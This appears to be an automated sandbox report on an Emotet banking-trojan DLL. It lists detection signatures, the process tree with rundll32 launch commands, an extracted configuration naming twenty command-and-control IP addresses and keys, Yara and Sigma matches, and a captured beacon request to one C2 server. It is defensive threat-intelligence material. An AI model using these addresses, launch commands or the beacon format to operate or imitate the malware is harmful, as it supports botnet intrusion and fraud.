Play interactive tour

Edit tour

Windows Analysis Report wNjqkrm8pH

Overview

General Information

Sample Name:	wNjqkrm8pH (renamed file extension from none to dll)
Analysis ID:	524862
MD5:	699b39c805f6a366707eb9a0e580bc0d
SHA1:	04489a4c9d50b62a9ff16f5baa67f568b2eb46ed
SHA256:	142d330305cf2bba895b000b9c7c2da6c6b38cb728d3fb347da8dd9f0bed4845
Tags:	32dllexe
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Sigma detected: Emotet RunDLL32 Process Creation

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6164 cmdline: loaddll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 2804 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5940 cmdline: rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 2944 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6280 cmdline: rundll32.exe C:\Users\user\Desktop\wNjqkrm8pH.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 672 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hsngzdtsiohsyp\jlodhhplzusb.iie",cwqsUWjgRvl MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6388 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Hsngzdtsiohsyp\jlodhhplzusb.iie",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6416 cmdline: rundll32.exe C:\Users\user\Desktop\wNjqkrm8pH.dll,abziuleoxsborpb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6828 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6420 cmdline: rundll32.exe C:\Users\user\Desktop\wNjqkrm8pH.dll,aejkroaebsbxdnkhb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1304 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6848 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 5932 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5416 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2276 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2236 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.352402052.000000000344A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.415487729.000000000117D000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.413760673.0000000000D1A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.426884632.000000000328A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.415304095.00000000032EA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000E.00000002.816631755.0000000000C67000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.352283785.0000000000E2A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.rundll32.exe.3304250.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.d341f8.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.3464320.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.d341f8.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.32a6388.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.e45298.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.3304250.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.3464320.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.32a6388.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.rundll32.exe.e45298.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 5 entries

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation

Show sources

Source: Process started

Author: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5940, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\wNjqkrm8pH.dll",Control_RunDLL, ProcessId: 2944

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 2.2.rundll32.exe.e45298.1.raw.unpack

Malware Configuration Extractor: Emotet {"Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Multi AV Scanner detection for submitted file

Show sources

Source: wNjqkrm8pH.dll

Virustotal: Detection: 24%

Perma Link

Source: wNjqkrm8pH.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.3:49747 version: TLS 1.2

Source: wNjqkrm8pH.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9DD1EE FindFirstFileExA,	0_2_6E9DD1EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E9DD1EE FindFirstFileExA,	2_2_6E9DD1EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00EB1A80 FindFirstFileW,	14_2_00EB1A80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.3:49747 -> 51.178.61.60:443

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 51.178.61.60 187

Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 51.178.61.60:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 45.79.33.48:8080
Source: Malware configuration extractor	IPs: 196.44.98.190:8080
Source: Malware configuration extractor	IPs: 177.72.80.14:7080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.169.10:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 195.154.146.35:443

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: EcobandGH EcobandGH
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

Source: global traffic

HTTP traffic detected: GET /BJKdnuOnKNLLGEDBpJpeXPiWYvJQgGvoYhhdIpnN HTTP/1.1Cookie: kpcXAWpZfRkJEAy=i+5bJ+1ZInDjvfPM+1JhKt+KWj8rVMERTO3MBxIOillAvxAx2ioHmQPbtLgNLA6EGFRwLshnv6kCnZWyIXAgbMZzd1u5zeY7pIcnc7NYlk4ptgX0JiJVkIXW1dfaYySomVYPcSiwpIcomQgIb/a5XevS7QE2etUd+zxfOWZFj62QjzAO7FAj4VKuBSkPo+IBUjmiQKTNcL09qokscyBsIQcAMaCCPfrdl8uN2W5z+g+7Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 196.44.98.190 196.44.98.190
Source: Joe Sandbox View	IP Address: 78.46.73.125 78.46.73.125

Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60

Source: svchost.exe, 00000019.00000003.612262816.0000025AA9597000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-16T17:55:04.3185617Z\|\|.\|\|2bbf585d-742f-4e5f-bf99-34064e28fbbf\|\|1152921505694183347\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000019.00000003.612262816.0000025AA9597000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-16T17:55:04.3185617Z\|\|.\|\|2bbf585d-742f-4e5f-bf99-34064e28fbbf\|\|1152921505694183347\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"

Source: svchost.exe, 00000019.00000002.631623148.0000025AA8CEB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000019.00000002.631623148.0000025AA8CEB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000019.00000002.631915215.0000025AA9572000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606542705.0000025AA959A000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606523146.0000025AA958A000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 00000019.00000002.631915215.0000025AA9572000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606542705.0000025AA959A000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606523146.0000025AA958A000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000019.00000002.631915215.0000025AA9572000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606542705.0000025AA959A000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606523146.0000025AA958A000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000019.00000002.631915215.0000025AA9572000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606542705.0000025AA959A000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.606523146.0000025AA958A000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000019.00000003.607542266.0000025AA9575000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.607594577.0000025AA9599000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_00EC1027 InternetReadFile,

14_2_00EC1027

Source: global traffic

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.3:49747 version: TLS 1.2

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9B5EE0 GetClipboardViewer,GetClipboardViewer,GetSystemDefaultLangID,GetOpenClipboardWindow,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,GetCurrentThread,GetForegroundWindow,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,AnyPopup,GetUserDefaultUILanguage,GetUserDefaultUILanguage,GetCurrentThread,GetCurrentThread,GetErrorMode,GetErrorMode,GetThreadErrorMode,

0_2_6E9B5EE0

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 4.2.rundll32.exe.3304250.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.d341f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.3464320.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.d341f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.32a6388.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.e45298.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.3304250.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.3464320.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.32a6388.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.e45298.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.352402052.000000000344A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.415487729.000000000117D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.413760673.0000000000D1A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.426884632.000000000328A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.415304095.00000000032EA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.816631755.0000000000C67000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.352283785.0000000000E2A000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Source: wNjqkrm8pH.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Hsngzdtsiohsyp\jlodhhplzusb.iie:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Hsngzdtsiohsyp\

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010543B3	0_2_010543B3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0104441E	0_2_0104441E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0105CAA8	0_2_0105CAA8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01043502	0_2_01043502
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01042309	0_2_01042309
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0105FD10	0_2_0105FD10
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0104251C	0_2_0104251C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01046B25	0_2_01046B25
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01045923	0_2_01045923
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0106292B	0_2_0106292B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01060B34	0_2_01060B34
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01043345	0_2_01043345
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01061343	0_2_01061343
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0105F14D	0_2_0105F14D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01043F5C	0_2_01043F5C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0104C158	0_2_0104C158
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01051F6B	0_2_01051F6B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0105056A	0_2_0105056A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0105577E	0_2_0105577E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01049384	0_2_01049384
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01054D8D	0_2_01054D8D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01044F8E	0_2_01044F8E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0104758F	0_2_0104758F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0105B397	0_2_0105B397
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0104FD91	0_2_0104FD91
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01061193	0_2_01061193
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0105D99A	0_2_0105D99A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01059DA1	0_2_01059DA1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01052FA2	0_2_01052FA2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01054BAA	0_2_01054BAA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0105B1B5	0_2_0105B1B5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0104BFB6	0_2_0104BFB6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01057BB2	0_2_01057BB2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01046FC4	0_2_01046FC4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010625C3	0_2_010625C3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0104A3DF	0_2_0104A3DF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0105BFE8	0_2_0105BFE8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_010603F1	0_2_010603F1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0104C5FE	0_2_0104C5FE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01044C00	0_2_01044C00
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01048C09	0_2_01048C09
